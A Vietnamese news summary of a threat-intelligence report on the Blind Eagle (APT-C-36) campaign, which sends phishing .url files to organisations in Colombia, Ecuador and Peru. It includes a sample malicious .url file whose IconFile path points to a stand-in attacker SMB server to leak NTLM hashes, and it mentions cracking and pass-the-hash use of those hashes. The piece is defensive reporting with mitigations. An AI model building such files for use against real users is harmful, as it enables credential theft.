Chiến Dịch Tấn Công Mạng Blind Eagle: Đe Dọa Tinh Vi Tại Nam Mỹ

14/03/2025
2 mins read

Bài viết từ GBHackers thảo luận về nhóm đe dọa mạng được gọi là Blind Eagle (còn được theo dõi dưới tên APT-C-36), đã khởi động một chiến dịch tinh vi nhằm vào các tổ chức chủ yếu ở Nam Mỹ bằng cách sử dụng các tệp .url đã được vũ khí hóa. Dưới đây là những điểm chính từ bài viết:

Nội dung
1. Kênh tấn công
2. Cơ chế kỹ thuật
3. Tác động và phát hiện
4. Các tổ chức bị nhắm mục tiêu
5. Chiến lược giảm thiểu

1. Kênh tấn công

  • Blind Eagle đang sử dụng email lừa đảo có chứa các tệp .url phím tắt có vẻ vô hại nhưng thực sự là mối đe dọa, khiến người dùng không nghi ngờ gì.
  • Khi mở các tệp này, chúng sẽ khởi tạo một kết nối đến một máy chủ từ xa do những kẻ tấn công kiểm soát, buộc hệ thống của nạn nhân phải xác thực và vô tình truyền tải các băm xác thực NTLM.

2. Cơ chế kỹ thuật

  • Các tệp .url chứa mã được tạo ra đặc biệt để đảm bảo hệ thống của nạn nhân cố gắng xác thực với máy chủ SMB do kẻ tấn công kiểm soát.
  • Cấu trúc của các tệp .url độc hại bao gồm:
        [InternetShortcut]
        URL=https://legitimate-looking-website.com
        IconFile=\\\\attacker-server\\share\\icon.ico
        IconIndex=0
  • Khi nạn nhân mở tệp này, Windows sẽ tự động cố gắng lấy tệp biểu tượng từ đường dẫn mạng đã chỉ định, gửi băm NTLM của người dùng trong quá trình này.

    • 3. Tác động và phát hiện

    • Những kẻ tấn công sẽ ghi lại băm NTLM bằng các công cụ như Responder hoặc các tiện ích thu thập băm tương tự, có thể bị phá vỡ ngoại tuyến để tiết lộ mật khẩu dưới dạng văn bản hoặc được sử dụng trong các cuộc tấn công pass-the-hash để di chuyển bên trong các mạng đã bị xâm phạm.
    • Chiến dịch này nổi bật với các biện pháp bảo mật hoạt động tinh vi, với việc những kẻ tấn công thường xuyên thay đổi cơ sở hạ tầng của họ để tránh bị phát hiện.

    4. Các tổ chức bị nhắm mục tiêu

    • Cuộc tấn công chủ yếu nhắm vào các tổ chức tài chính, cơ quan chính phủ và các tổ chức sản xuất ở Colombia, Ecuador và Peru, với bằng chứng cho thấy có thể mở rộng sang các khu vực khác.

    5. Chiến lược giảm thiểu

    • Các tổ chức được khuyến cáo thực hiện các chính sách lọc email nghiêm ngặt, vô hiệu hóa xác thực SMB tự động với các máy chủ bên ngoài, và đảm bảo rằng tất cả các hệ thống được cập nhật với các bản vá bảo mật mới nhất để giảm thiểu mối đe dọa này.

    Chiến dịch này nêu bật các phương thức ngày càng tiến hóa của tội phạm mạng, những người ngày càng sử dụng các phương pháp tinh vi để vượt qua các biện pháp bảo mật truyền thống và xâm nhập vào các mạng doanh nghiệp.